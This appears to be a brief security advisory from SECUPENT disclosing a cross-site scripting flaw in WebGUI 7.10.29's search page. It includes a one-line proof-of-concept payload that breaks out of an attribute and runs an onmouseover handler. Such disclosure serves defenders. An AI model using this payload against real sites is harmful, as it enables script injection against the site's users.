Posted by SECUPENT Research Center on Jan 20

Exploit Title: WebGUI 7.10.29 stable version Cross site scripting vulnerability
Software Link: http://www.webgui.org/download
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 17-1-2015
Version: 7.10.29. Previous version maybe vulnerable also.

Vulnerable area: http://localhost/style-underground/search

XSS PoC: 1″ onmouseover=prompt(907460) bad=”

Screenshot:
Link:…